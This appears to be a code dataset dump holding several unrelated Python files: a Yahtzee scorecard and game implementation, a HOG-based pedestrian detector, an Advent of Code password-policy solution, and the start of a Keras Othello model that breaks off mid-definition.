for threeOfAKind in self.diceCounts.index[self.diceCounts > 2]:
threeOfAKindScore = max(threeOfAKindScore,
Scorecard.PointsCalculator._calcOfAKindScore(3, threeOfAKind, self.diceValues))
return threeOfAKindScore
def _calc4ofAKind(self):
# 4-of-a-kind score is max of all available four-of-a-kinds
# -note: in normal, 5-dice game, this is overkill
fourOfAKindScore = 0
for fourOfAKind in self.diceCounts.index[self.diceCounts > 3]:
fourOfAKindScore = max(fourOfAKindScore,
Scorecard.PointsCalculator._calcOfAKindScore(4, fourOfAKind, self.diceValues))
return fourOfAKindScore
    def _calcFullHouse(self):
      # full house score: fixed points when the dice form a full house
      hasFullHouse = Scorecard.PointsCalculator._hasFullHouse(self.diceCounts)
      fullHouseScore = Scorecard.POINTS.FULL_HOUSE.value if hasFullHouse else 0
      return fullHouseScore
    def _calcSmallStraight(self):
      # small straight score: a run one shorter than the number of dice
      hasSmallStraight = Scorecard.PointsCalculator._hasStraight(self.uniqueSortedDice, len(self.diceSorted) - 1)
      smallStraightScore = Scorecard.POINTS.SMALL_STRAIGHT.value if hasSmallStraight else 0
      return smallStraightScore
    def _calcLargeStraight(self):
      # large straight score: a run spanning all the dice
      hasLargeStraight = Scorecard.PointsCalculator._hasStraight(self.uniqueSortedDice, len(self.diceSorted))
      largeStraightScore = Scorecard.POINTS.LARGE_STRAIGHT.value if hasLargeStraight else 0
      return largeStraightScore
    def _calcChance(self):
      """ Chance score: sum of all dice """
      return sum(self.diceValues)
    def _calcYahtzee(self):
      """ Yahtzee score: fixed points when all dice match, else 0 """
      return Scorecard.POINTS.YAHTZEE.value if Scorecard.PointsCalculator._hasYahtzee(self.diceCounts) else 0
def _calcYahtzeeBonus(self):
# yahtzee bonus
canGetYahtzeeBonus = len(self.diceCounts) == 1 and\
self.scorecard.getRowScore("Yahtzee") is not None
return Scorecard.POINTS.YAHTZEE_BONUS if canGetYahtzeeBonus else None
        def __init__(self, scorecard):
            """
            Score calculator for a single roll of the dice.

            scorecard: (Scorecard) used to look up rows that are already
                       scored (needed for the yahtzee bonus / joker rules)
            """
            self.scorecard = scorecard
            # dice info -- populated by calculate(), None until then
            self.diceValues = None        # raw dice values as passed in
            self.diceSorted = None        # dice values sorted ascending
            self.diceCounts = None        # pandas Series: face -> occurrence count
            self.uniqueSortedDice = None  # sorted list of distinct faces
            # score function mappings: lower-section row -> calculator method
            self.scoreFn = {
                Scorecard.ROW_NAME.THREE_OF_A_KIND: self._calc3ofAKind,
                Scorecard.ROW_NAME.FOUR_OF_A_KIND: self._calc4ofAKind,
                Scorecard.ROW_NAME.FULL_HOUSE: self._calcFullHouse,
                Scorecard.ROW_NAME.SMALL_STRAIGHT: self._calcSmallStraight,
                Scorecard.ROW_NAME.LARGE_STRAIGHT: self._calcLargeStraight,
                Scorecard.ROW_NAME.CHANCE: self._calcChance,
                Scorecard.ROW_NAME.YAHTZEE: self._calcYahtzee,
                Scorecard.ROW_NAME.YAHTZEE_BONUS: self._calcYahtzeeBonus
            }
            # score sections that score max value when the joker rule applies
            self.jokerEligibleSections = {
                Scorecard.ROW_NAME.FULL_HOUSE: Scorecard.POINTS.FULL_HOUSE.value,
                Scorecard.ROW_NAME.SMALL_STRAIGHT: Scorecard.POINTS.SMALL_STRAIGHT.value,
                Scorecard.ROW_NAME.LARGE_STRAIGHT: Scorecard.POINTS.LARGE_STRAIGHT.value
            }
        def calculate(self, rowNameList, diceValues):
            """
            # Find the score that would be earned in each row for <rowNameList>
            # when given the <diceValues>
            #
            # rowNameList: (list) row names to evaluate -- upper-section word
            #              names ("Ones", ...) and/or Scorecard.ROW_NAME values
            # diceValues: (list) current face value of every die
            #
            # returns: (dict) row name (str) -> score that roll would earn
            """
            logger.debug("points calculate: {}, {}".format(rowNameList, diceValues))
            # sort and process dice
            self.diceValues = diceValues
            self.diceSorted = sorted(diceValues)
            self.diceCounts = pd.Series(self.diceSorted).value_counts()
            self.uniqueSortedDice = sorted(self.diceCounts.index.to_list())
            # separate the row names into upper and lower section rows
            # -lower section rows are defined in Scorecard.ROW_NAME
            # -upper section rows are assigned as everything else and checked later
            upperSectionRows = []
            lowerSectionRows = []
            for rowName in rowNameList:
                try:
                    lowerSectionRows.append(Scorecard.ROW_NAME(rowName))
                except ValueError:
                    upperSectionRows.append(rowName)
            results = {}
            # upper section calculations
            for sectionName in upperSectionRows:
                # convert row word to number
                try:
                    sectionNum = Scorecard.wordToNum(sectionName)
                # raises KeyError if we have been passed an unknown row name
                except KeyError:
                    raise KeyError("Unknown rowName was given: {}".format(sectionName))
                # calculate the score for this row
                results[sectionName] = self._calcUpperSection(sectionNum)
            # does the joker rule apply, i.e.:
            # -the yahtzee score has been taken, and is not 0
            # -this the second+ yahtzee
            isJoker = Scorecard.PointsCalculator._hasYahtzee(self.diceCounts) and\
                self.scorecard.getRowScore(Scorecard.ROW_NAME.YAHTZEE.value) == Scorecard.POINTS.YAHTZEE.value
            logger.debug("points calculate: isJoker: {}".format(isJoker))
            # if the joker rule applies, scoring in the upper section takes priority
            if isJoker:
                # did we score in the upper section
                scoredInUpperSection = sum(results.values()) > 0
                # we add the yahtzee bonus regardless of where we score
                currBonus = self.scorecard.getRowScore(Scorecard.ROW_NAME.YAHTZEE_BONUS.value)
                if currBonus is None:
                    currBonus = 0
                results[Scorecard.ROW_NAME.YAHTZEE_BONUS.value] = currBonus + Scorecard.POINTS.YAHTZEE_BONUS.value
                # if we can score in the upper section, we have to, so we're done
                # (the lower section is not evaluated at all in that case)
                if scoredInUpperSection:
                    logger.debug("points calculate: results (no lower): {}".format(results))
                    return results
            logger.debug("points calculate: 2")
            # lower section calculations
            # -don't need to check for KeyErrors as <lowerSectionRows> is taken
            # directly from <scoreFn>'s keys
            for sectionName in lowerSectionRows:
                results[sectionName.value] = self.scoreFn[sectionName]()
            # if the joker rule applies then we can score the max values in
            # the joker-eligible sections (full house / straights)
            if isJoker:
                for rowName, maxRowScore in self.jokerEligibleSections.items():
                    if results.get(rowName.value, None) is not None:
                        results[rowName.value] = maxRowScore
            return results
@staticmethod
def numToWord(num):
""" Convert an integer to it's name equivalent """
return Scorecard.numberWords[num].capitalize()
@staticmethod
def wordToNum(word):
""" Convert an integer name equivalent back to its integer """
wordLower = word.lower()
for k,v in Scorecard.numberWords.items():
if v == wordLower:
return k
raise KeyError("{} not present in mapping".format(wordLower))
def __init__(self, numberOfDiceFaces=6):
# CHECK: we support the number of dice faces
if numberOfDiceFaces < Scorecard.MIN_DICE_FACES or numberOfDiceFaces > Scorecard.MAX_DICE_FACES:
raise ValueError("dice faces must be between {} and {}"
.format(Scorecard.MIN_DICE_FACES, Scorecard.MAX_DICE_FACES))
# generate sections for each dice face
scorecardUpper = OrderedDict()
for num in range(1, numberOfDiceFaces+1):
scorecardUpper.update({Scorecard.numToWord(num): None})
scorecardUpper.update({"Upper Total": None})
scorecardUpper.update({"Upper Bonus": None})
# lower scoring sections
scorecardLower = OrderedDict()
scorecardLower.update({
"Three of a Kind": None,
"Four of a Kind": None,
"Full House": None,
"Small Straight": None,
"Large Straight": None,
"Chance": None,
"Yahtzee": None,
"Yahtzee Bonus": None,
"Lower Total": None,
})
# store info
self.numberOfDiceFaces = numberOfDiceFaces
# store the scorecard
self.scorecardUpper = scorecardUpper
self.scorecardLower = scorecardLower
# calculate the upper section's bonus threshold
self.upperBonusThreshold = sum(list(range(1, self.numberOfDiceFaces + 1))) * 3
def canScoreRow(self, rowName, diceValues):
""" Can we score, or update the score, in this row """
# free rows, i.e., can be score in
freeRows = self.getFreeRows()
# name of the upper section if this is a yahtzee
upperSectionDiceRow = Scorecard.numToWord(diceValues[0])
# if this is a joker then must score upper section first
if self.isJoker(diceValues) and upperSectionDiceRow in freeRows:
return rowName == upperSectionDiceRow
# not a joker, then check if the row is free
return rowName in freeRows
@staticmethod
def isBonusRow(rowName):
""" Is <rowName> a bonus row """
return rowName == Scorecard.ROW_NAME.YAHTZEE_BONUS
def isJoker(self, diceValues):
"""
# Does the joker rule apply
# -we have a yahtzee now
# AND
# -this isn't our first yahtzee
"""
diceCounts = pd.Series(diceValues).value_counts()
return len(diceCounts) == 1 and \
self.getRowScore(Scorecard.ROW_NAME.YAHTZEE.value) == Scorecard.POINTS.YAHTZEE.value
def getAllScores(self):
""" Return the full score card in order """
totalScorecard = OrderedDict
totalScorecard.update(self.scorecardUpper)
totalScorecard.update(self.scorecardLower)
return totalScorecard
def getRowNames(self, section="all"):
""" Return the names of all the scorecard rows, including the totals """
sectionNameLower = section.lower()
if sectionNameLower == "all":
return list(self.scorecardUpper.keys()) + list(self.scorecardLower.keys())
elif sectionNameLower == "upper":
return list(self.scorecardUpper.keys())
elif sectionNameLower == "lower":
return list(self.scorecardLower.keys())
else:
raise ValueError("unknown section: {}".format(section))
def getRowScore(self, rowName):
"""
# Get the score for the <rowName> row
#
# rowName: (str) name of row
"""
try:
return self.scorecardUpper[rowName]
except KeyError:
return self.scorecardLower[rowName]
    def getPossibleScorecard(self, diceValues, rowNameList=None):
        """
        # What are the possible scores given the dice values
        # -total and bonuses are always set to None
        #
        # diceValues: (list) of dice values to use
        # rowNameList: (list) name of section(s) to calculate, default is all
        #
        # returns: (Scorecard) a fresh card holding only the would-be scores
        """
        logger.debug("getPossibleScorecard: dice: {}, sections: {}".format(diceValues, rowNameList))
        # filter the rowNameList by free rows, or use all free rows if no rows
        # are specified (already-scored rows never appear in the result)
        freeRows = self.getFreeRows()
        if rowNameList is None:
            rowNameList = freeRows
        else:
            rowNameList = list(filter(lambda x: x in freeRows, rowNameList))
        # create a points calculator and find the possible scores
        pointsCalc = Scorecard.PointsCalculator(self)
        scores = pointsCalc.calculate(rowNameList, diceValues)
        # create a new, blank scorecard and populate it with our results
        # -updateTotals=False keeps the total/bonus rows at None
        blankCard = Scorecard(self.numberOfDiceFaces)
        for rowName, rowScore in scores.items():
            blankCard.updateScore(rowName, rowScore, updateTotals=False)
        return blankCard
def getTotalScore(self):
""" Calculate and return the total score """
upperTotal = self.getRowScore(Scorecard.ROW_NAME.UPPER_TOTAL.value)
if upperTotal is None:
upperTotal = 0
upperBonus = self.getRowScore(Scorecard.ROW_NAME.UPPER_BONUS.value)
if upperBonus is None:
upperBonus = 0
lowerTotal = self.getRowScore(Scorecard.ROW_NAME.LOWER_TOTAL.value)
if lowerTotal is None:
lowerTotal = 0
return upperTotal + upperBonus + lowerTotal
    def updateScore(self, rowName, score, updateTotals=True):
        """
        # Update the score for the <rowName> row
        # -for normal rows the score is set to <score>, whilst bonus rows will
        #  be += the score (bonuses accumulate across multiple yahtzees)
        #
        # rowName: (str) name of row to set
        # score: (int) score to set
        # updateTotals: (bool) should we also update the section totals/bonuses
        #
        # raises KeyError when <rowName> is in neither section
        """
        logger.debug("setScore: {} = {}".format(rowName, score))
        # if the rowName is in the upper section, store it
        if rowName in self.scorecardUpper:
            # check if it's a bonus to add or score to set
            if Scorecard.isBonusRow(rowName):
                self.scorecardUpper[rowName] += score
            else:
                self.scorecardUpper[rowName] = score
            if updateTotals:
                self._updateUpperScore()
        # if the rowName is in the lower section, store it
        elif rowName in self.scorecardLower:
            # check if it's a bonus to add or score to set
            if Scorecard.isBonusRow(rowName):
                self.scorecardLower[rowName] += score
            else:
                self.scorecardLower[rowName] = score
            if updateTotals:
                self._updateLowerScore()
        # KeyError if the rowName isn't valid
        else:
            raise KeyError("unknown rowName: {}".format(rowName))
def _updateUpperScore(self):
""" Calculate and store the total score for the upper section """
# upper row names
upperKeys = list(self.scorecardUpper.keys())
# CHECK: total and bonus are at the end
if upperKeys[-2] != Scorecard.ROW_NAME.UPPER_TOTAL.value or\
upperKeys[-1] != Scorecard.ROW_NAME.UPPER_BONUS.value:
raise ValueError("scorecard layout is not as expected")
# add up in individual scores
total = 0
for rowKey in upperKeys[:-2]:
if self.scorecardUpper[rowKey] is not None:
total += self.scorecardUpper[rowKey]
# see if the bonus should be added
if total >= self.upperBonusThreshold:
self.scorecardUpper[upperKeys[-1]] = Scorecard.POINTS.UPPER_BONUS.value
else:
self.scorecardUpper[upperKeys[-1]] = None
# store the new total score
self.scorecardUpper[upperKeys[-2]] = total
def _updateLowerScore(self):
""" Calculate and store the total score for the lower section """
lowerKeys = list(self.scorecardLower.keys())
# CHECK: total is at the end
if lowerKeys[-1] != Scorecard.ROW_NAME.LOWER_TOTAL.value:
raise ValueError("scorecard layout is not as expected")
# add up in individual scores
total = 0
for rowKey in lowerKeys[:-1]:
if self.scorecardLower[rowKey] is not None:
total += self.scorecardLower[rowKey]
# store the new score
self.scorecardLower[lowerKeys[-1]] = total
def iterateOverScorecard(self):
""" Iterate over all the scorecard entries """
for k,v in self.scorecardUpper.items():
yield k,v
for k,v in self.scorecardLower.items():
yield k,v
def getFreeRows(self):
""" Returns list of row names that can be scored """
# ignore rows that base their value on something else
ignoreRows = [Scorecard.ROW_NAME.UPPER_TOTAL.value,
Scorecard.ROW_NAME.UPPER_BONUS.value,
Scorecard.ROW_NAME.YAHTZEE_BONUS.value,
Scorecard.ROW_NAME.LOWER_TOTAL.value]
# return any rows with no score, ignoring the "meta rows"
return [rowName for rowName, rowScore in self.iterateOverScorecard()
if rowScore is None and rowName not in ignoreRows]
class Player:
    """ A participant in the game: a display name plus their scorecard """

    def __init__(self, name, scorecard):
        self.name = name
        self.scorecard = scorecard

    def getName(self):
        """ The player's display name """
        return self.name

    def getScorecard(self):
        """ The player's scorecard object """
        return self.scorecard
class Game:
    """
    # A single game: owns the players, the dice state, the turn order and
    # the overall game status
    """
    # limits accepted by the constructor
    MIN_NUM_DICE = 5
    MAX_NUM_DICE = 9
    MIN_DICE_FACES = 6
    MAX_DICE_FACES = 20
    MIN_NUM_ROLLS = 1
    MAX_NUM_ROLLS = 5
    MIN_PLAYER_NAME_LENGTH = 1
    MAX_PLAYER_NAME_LENGTH = 20
    class STATUS(Enum):
        """ Status of the current game """
        NOT_STARTED = 0
        RUNNING = 1
        FINISHED = 2
    def __init__(self, playerNameList, numberOfDice=5, numberOfDiceFaces=6, numberOfRolls=3):
        """
        # playerNameList: (list) names of the players to add immediately
        # numberOfDice: (int) number of dice rolled each turn
        # numberOfDiceFaces: (int) number of faces on each die
        # numberOfRolls: (int) rolls allowed per turn
        """
        # CHECK: number of dice
        if not (Game.MIN_NUM_DICE <= numberOfDice <= Game.MAX_NUM_DICE):
            raise ValueError(
                "number of dice must be between {} and {}".format(Game.MIN_NUM_DICE, Game.MAX_NUM_DICE))
        # CHECK: number of dice faces
        if not (Game.MIN_DICE_FACES <= numberOfDiceFaces <= Game.MAX_DICE_FACES):
            raise ValueError(
                "number of dice faces must be between {} and {}".format(Game.MIN_DICE_FACES, Game.MAX_DICE_FACES))
        # CHECK: number of dice rolls
        if not (Game.MIN_NUM_ROLLS <= numberOfRolls <= Game.MAX_NUM_ROLLS):
            raise ValueError(
                "number of dice rolls must be between {} and {}".format(Game.MIN_NUM_ROLLS, Game.MAX_NUM_ROLLS))
        # seed random number generator (no argument: uses system entropy/time)
        random.seed()
        # game config info
        self.numberOfDice = numberOfDice
        self.numberOfDiceFaces = numberOfDiceFaces
        self.numberOfRolls = numberOfRolls
        self.players = []
        self.gameStatus = Game.STATUS.NOT_STARTED
        # the number of turns in the game (per player; totalGameTurns is set
        # once players are added)
        self.turnsPerPlayer = Game.calculateTotalGameTurns(self.numberOfDiceFaces)
        self.totalGameTurns = None
        # keep track of the current player and their remaining turns
        self.currentPlayerIndex = None
        self.remainingRolls = self.numberOfRolls
        # list of current values of the dice (None until first roll)
        self.diceValues = [None] * numberOfDice
        # list of player-held dice
        self.heldDice = [False] * numberOfDice
        # add any initial players
        for playerName in playerNameList:
            self.addPlayer(playerName)
    @staticmethod
    def calculateTotalGameTurns(numberOfDiceFaces):
        """ How many turns will this game have for each player """
        # one turn per upper-section face row plus the 7 scorable lower rows
        return 7 + numberOfDiceFaces
    # simple accessors
    def getAllPlayers(self): return self.players
    def getCurrentPlayer(self): return self.players[self.currentPlayerIndex]
    def getDiceValues(self): return self.diceValues
    def getGameStatus(self): return self.gameStatus
    def getNumberOfDice(self): return self.numberOfDice
    def getNumberOfDiceFaces(self): return self.numberOfDiceFaces
    def getNumberOfPlayers(self): return len(self.players)
    def getNumberOfRolls(self): return self.numberOfRolls
    def getRemainingRolls(self): return self.remainingRolls
    def getHeldDice(self):
        """ Return the indices of the held dice """
        return [iDice for iDice, isHeld in enumerate(self.heldDice) if isHeld]
    def getPlayer(self, name):
        """ Return the player with the given name, or None if not found """
        for player in self.players:
            if player.getName() == name:
                return player
        return None
    def getTotalScores(self):
        """ Get the total scores for all players, keyed by player name """
        return {player.getName(): player.getScorecard().getTotalScore() for player in self.players}
    def getScorePossibilities(self):
        """
        # Based on the current values of the dice, what are the score possibilities
        # for each of the free scorecard rows
        """
        # NOTE(review): the Scorecard code visible in this file defines
        # getPossibleScorecard(), not getScorePossibilities() -- confirm the
        # latter exists elsewhere, otherwise this raises AttributeError
        return self.getCurrentPlayer().getScorecard().getScorePossibilities(self.getDiceValues())
    def setDiceHold(self, diceNum, isHeld):
        """ Hold or release this die """
        # can only hold a die after the first roll of a running game
        canHold = self.getGameStatus() == Game.STATUS.RUNNING and self.getRemainingRolls() < self.getNumberOfRolls()
        self.heldDice[diceNum] = isHeld and canHold
    def setStatus(self, status):
        """ Set the status of the current game """
        if status not in Game.STATUS:
            raise ValueError("status {} is not a valid status".format(status))
        self.gameStatus = status
    def score(self, rowName):
        """
        # Apply the appropriate score to the <rowName> row, given the current diceValues
        #
        # rowName: (str) name of row to score on
        #
        """
        logger.debug("score: {}".format(rowName))
        # get the current player's scorecard
        playerScorecard = self.getCurrentPlayer().getScorecard()
        # CHECK: row doesn't already have a score
        # -silently ignored (rather than raised) so a repeated request is
        #  harmless; note this also prevents re-scoring the Yahtzee row
        if playerScorecard.getRowScore(rowName) is not None:
            return
        # calculate the score for this row
        pointsCalc = Scorecard.PointsCalculator(playerScorecard)
        scores = pointsCalc.calculate([rowName], self.getDiceValues())
        # store the score(s)
        # -may be more than one score if there is a yahtzee bonus
        for scoreName, scoreValue in scores.items():
            playerScorecard.updateScore(scoreName, scoreValue)
    def advanceTurn(self):
        """ End the turn of the current player and move on to the next """
        logger.debug("advanceTurn")
        # next player (wraps around)
        self.currentPlayerIndex = (self.currentPlayerIndex + 1) % self.getNumberOfPlayers()
        # reset turns
        self.remainingRolls = self.numberOfRolls
        # reset dice
        self.diceValues = [None] * self.numberOfDice
        self.heldDice = [False] * self.numberOfDice
        # decrement the number of game turns and check if the game is over
        self.totalGameTurns -= 1
        if self.totalGameTurns == 0:
            self.setStatus(Game.STATUS.FINISHED)
    def rollDice(self):
        """ Roll the non-held dice """
        # CHECK: there are turns remaining
        if self.remainingRolls < 1:
            raise SystemError("trying to roll dice when there are no turns left")
        # get the indices of the non-held dice
        freeDiceIndices = [iDice for iDice, isHeld in enumerate(self.heldDice) if not isHeld]
        # roll this number of dice
        newRolls = self._rollFreeDice(len(freeDiceIndices))
        # assign the new dice rolls to the free dice (held dice keep their
        # previous values)
        for iRoll, diceVal in enumerate(newRolls):
            self.diceValues[freeDiceIndices[iRoll]] = diceVal
        # decrement number of turns left
        self.remainingRolls -= 1
    def _rollFreeDice(self, numberOfDice):
        """ Roll <numberOfDice> dice and return the list of face values """
        # no dice
        if numberOfDice < 1:
            return []
        # make sure we can roll this many dice
        if numberOfDice > self.numberOfDice:
            raise SystemError("tried to roll {} dice, but only have {} in the game"
                              .format(numberOfDice, self.numberOfDice))
        # roll the dice (uniform over 1..numberOfDiceFaces inclusive)
        return [random.randint(1, self.numberOfDiceFaces) for _ in range(numberOfDice)]
    def addPlayer(self, playerName):
        """ Add a player called <playerName> to the game """
        # CHECK: player name is a string
        if not isinstance(playerName, str):
            raise TypeError("player name must be a string")
        # CHECK: player name is unique
        if playerName in [x.name for x in self.players]:
            raise ValueError("player name is already taken")
        # CHECK: game hasn't started
        if self.getGameStatus() != Game.STATUS.NOT_STARTED:
            raise SystemError("can't add a player after the game has started")
        # create a new player with a blank scorecard
        player = Player(playerName, Scorecard(self.numberOfDiceFaces))
        self.players.append(player)
        # if this is the first player, make it their turn
        if self.getNumberOfPlayers() == 1:
            self.currentPlayerIndex = 0
        # update the total number of game turns
        self.totalGameTurns = self.turnsPerPlayer * self.getNumberOfPlayers()
    def removePlayer(self, playerName):
        """ Remove the player <playerName> from the game """
        # CHECK: player name is a string
        if not isinstance(playerName, str):
            raise TypeError("player name must be a string")
        # CHECK: game hasn't started
        if self.getGameStatus() != Game.STATUS.NOT_STARTED:
            raise SystemError("can't remove a player after the game has started")
        # remove the player and recalculate the number of total game turns
        for player in self.players:
            if player.name == playerName:
                self.players.remove(player)
                self.totalGameTurns = self.turnsPerPlayer * self.getNumberOfPlayers()
                return
        # player wasn't found
        raise ValueError("player {} is not part of this game".format(playerName))
| 5,235 | 23,753 | 142 |
a4b5f46626461c77388301799358a40d1abdf4d8 | 2,832 | py | Python | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 27 | 2019-06-01T10:45:00.000Z | 2020-04-30T20:18:54.000Z | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 3 | 2020-02-17T14:34:26.000Z | 2020-04-05T03:58:37.000Z | run.py | waalbukhanajer/Pedestrian-detection | e9e1dc5632b86f0d77549a799b265dce00a038a4 | [
"MIT"
] | 11 | 2019-07-31T18:44:18.000Z | 2020-05-07T07:35:41.000Z | import cv2
import numpy as np
import time
from skimage.feature import hog
from sklearn.externals import joblib
from nms import nms
import argparse
# made by abhinav sagar on 7/2/2019
parser = argparse.ArgumentParser(description='To read image name')
parser.add_argument('-i', "--image", help="Path to the test image", required=True)
parser.add_argument('-d','--downscale', help="Downscale ratio", default=1.2, type=float)
parser.add_argument('-v', '--visualize', help="Visualize the sliding window", action="store_true")
parser.add_argument('-w', '--winstride', help="Pixels to move in one step, in any direction", default=8, type=int)
parser.add_argument('-n', '--nms_threshold', help="Threshold Values between 0 to 1 for NMS thresholding. Default is 0.2", default=0.2, type=float)
args = vars(parser.parse_args())
clf = joblib.load("pedestrian.pkl")
orig = cv2.imread(args["image"])
img = orig.copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
scaleFactor = args["downscale"]
inverse = 1.0/scaleFactor
winStride = (args["winstride"], args["winstride"])
winSize = (128, 64)
rects = []
h, w = gray.shape
count = 0
while (h >= 128 and w >= 64):
print (gray.shape)
h, w= gray.shape
horiz = w - 64
vert = h - 128
print (horiz, vert)
i = 0
j = 0
while i < vert:
j = 0
while j < horiz:
portion = gray[i:i+winSize[0], j:j+winSize[1]]
features = hog(portion, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2), block_norm="L2")
result = clf.predict([features])
if args["visualize"]:
visual = gray.copy()
cv2.rectangle(visual, (j, i), (j+winSize[1], i+winSize[0]), (0, 0, 255), 2)
cv2.imshow("visual", visual)
cv2.waitKey(1)
if int(result[0]) == 1:
print (result, i, j)
confidence = clf.decision_function([features])
appendRects(i, j, confidence, count, rects)
j = j + winStride[0]
i = i + winStride[1]
gray = cv2.resize(gray, (int(w*inverse), int(h*inverse)), interpolation=cv2.INTER_AREA)
count = count + 1
print (count)
print (rects)
nms_rects = nms(rects, args["nms_threshold"])
for (a, b, conf, c, d) in rects:
cv2.rectangle(orig, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("Before NMS", orig)
cv2.waitKey(0)
for (a, b, conf, c, d) in nms_rects:
cv2.rectangle(img, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("After NMS", img)
cv2.waitKey(0)
# save output
cv2.imwrite("../output.jpg", img)
| 25.745455 | 146 | 0.608757 | import cv2
import numpy as np
import time
from skimage.feature import hog
from sklearn.externals import joblib
from nms import nms
import argparse
# made by abhinav sagar on 7/2/2019
def appendRects(i, j, conf, c, rects):
    """Map a sliding-window hit at pyramid level <c> back to original-image
    coordinates and append (x, y, conf, w, h) to <rects>.

    Uses the module-level ``scaleFactor`` (per-level downscale ratio)."""
    # cumulative downscale factor at this pyramid level
    scale = pow(scaleFactor, c)
    rects.append((int(j * scale), int(i * scale), conf,
                  int(64 * scale), int(128 * scale)))
parser = argparse.ArgumentParser(description='To read image name')
parser.add_argument('-i', "--image", help="Path to the test image", required=True)
parser.add_argument('-d','--downscale', help="Downscale ratio", default=1.2, type=float)
parser.add_argument('-v', '--visualize', help="Visualize the sliding window", action="store_true")
parser.add_argument('-w', '--winstride', help="Pixels to move in one step, in any direction", default=8, type=int)
parser.add_argument('-n', '--nms_threshold', help="Threshold Values between 0 to 1 for NMS thresholding. Default is 0.2", default=0.2, type=float)
args = vars(parser.parse_args())
clf = joblib.load("pedestrian.pkl")
orig = cv2.imread(args["image"])
img = orig.copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
scaleFactor = args["downscale"]
inverse = 1.0/scaleFactor
winStride = (args["winstride"], args["winstride"])
winSize = (128, 64)
rects = []
h, w = gray.shape
count = 0
while (h >= 128 and w >= 64):
print (gray.shape)
h, w= gray.shape
horiz = w - 64
vert = h - 128
print (horiz, vert)
i = 0
j = 0
while i < vert:
j = 0
while j < horiz:
portion = gray[i:i+winSize[0], j:j+winSize[1]]
features = hog(portion, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(2, 2), block_norm="L2")
result = clf.predict([features])
if args["visualize"]:
visual = gray.copy()
cv2.rectangle(visual, (j, i), (j+winSize[1], i+winSize[0]), (0, 0, 255), 2)
cv2.imshow("visual", visual)
cv2.waitKey(1)
if int(result[0]) == 1:
print (result, i, j)
confidence = clf.decision_function([features])
appendRects(i, j, confidence, count, rects)
j = j + winStride[0]
i = i + winStride[1]
gray = cv2.resize(gray, (int(w*inverse), int(h*inverse)), interpolation=cv2.INTER_AREA)
count = count + 1
print (count)
print (rects)
nms_rects = nms(rects, args["nms_threshold"])
for (a, b, conf, c, d) in rects:
cv2.rectangle(orig, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("Before NMS", orig)
cv2.waitKey(0)
for (a, b, conf, c, d) in nms_rects:
cv2.rectangle(img, (a, b), (a+c, b+d), (0, 255, 0), 2)
cv2.imshow("After NMS", img)
cv2.waitKey(0)
# save output
cv2.imwrite("../output.jpg", img)
| 205 | 0 | 23 |
e1a12ad1445005c3a2d057a63d8fd83262e6e645 | 732 | py | Python | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | day_02/day_02.py | niccolomarcon/AoC_2020 | 1afe7453f7ad8c789a3f804c29159c0bb62a7499 | [
"MIT"
] | null | null | null | from collections import Counter
if __name__ == '__main__':
with open('input.txt') as input_file:
policy_pass_list = [read(line) for line in input_file]
valid_passwords = list(filter(valid, policy_pass_list))
print(len(valid_passwords))
| 26.142857 | 62 | 0.631148 | from collections import Counter
def read(line):
    """Parse one '<lo>-<hi> <char>: <password>' input line into
    ((char, lo, hi), password) — the trailing newline is stripped by
    dropping the last character."""
    policy, password = line.split(': ')
    bounds, char = policy.split()
    lo, hi = map(int, bounds.split('-'))
    return ((char, lo, hi), password[:-1])
def old_valid(entry):
    """Part-one policy: <char> must occur between <mini> and <maxi> times
    (inclusive) in the password."""
    (char, mini, maxi), password = entry
    occurrences = password.count(char)
    return mini <= occurrences <= maxi
def valid(entry):
    """Part-two policy: exactly one of the 1-indexed positions <i>, <j>
    holds <char> (an exclusive-or of the two position checks)."""
    (char, i, j), password = entry
    return (password[i - 1] == char) != (password[j - 1] == char)
if __name__ == '__main__':
    # parse every policy/password line from the puzzle input
    with open('input.txt') as input_file:
        policy_pass_list = [read(line) for line in input_file]
    # count the entries satisfying the part-two (position) policy
    valid_passwords = list(filter(valid, policy_pass_list))
    print(len(valid_passwords))
| 402 | 0 | 69 |
32d43f96150582c9c5347fd4550a23c693a423f8 | 2,403 | py | Python | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | null | null | null | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | null | null | null | vs_people.py | JeongUkJae/othello-ml-agent-implementation | f0cb61bc042718c76bbf25173032a3c1d19d41a5 | [
"MIT"
] | 1 | 2019-08-31T12:13:38.000Z | 2019-08-31T12:13:38.000Z | import sys
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, BatchNormalization
from keras.utils import to_categorical
from othello_ml import Othello, Action
from othello_ml.visualizer import Visualizer
from train import MLAgent, MLRenderer
model = Sequential([
Conv2D(
32,
kernel_size=(3, 3),
input_shape=(8, 8, 1),
padding='same',
activation='relu'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
Conv2D(32, (3, 3), activation='relu', padding='same'),
BatchNormalization(),
